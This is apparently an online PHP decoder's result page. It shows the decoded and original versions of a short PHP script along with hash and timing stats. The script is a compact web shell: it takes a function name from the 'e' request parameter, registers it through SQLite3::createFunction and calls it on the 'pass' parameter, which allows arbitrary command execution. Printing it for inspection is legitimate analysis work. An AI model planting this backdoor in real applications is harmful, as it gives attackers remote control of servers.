Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $e = $_REQUEST['e']; $db = new SQLite3('sqlite.db3'); $db->createFunction('myfunc..

Decoded Output download

<?php 
$e = $_REQUEST['e']; 
$db = new SQLite3('sqlite.db3'); 
$db->createFunction('myfunc', $e); 
$stmt = $db->prepare("SELECT myfunc(?)"); 
$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT); 
$stmt->execute(); 
?>

Did this file decode correctly?

Original Code

<?php
$e = $_REQUEST['e'];
$db = new SQLite3('sqlite.db3');
$db->createFunction('myfunc', $e);
$stmt = $db->prepare("SELECT myfunc(?)");
$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);
$stmt->execute();
?>

Function Calls

None

Variables

$e None

Stats

MD5 c235c698902439ac68ef12bc12bd6514
Eval Count 0
Decode Time 89 ms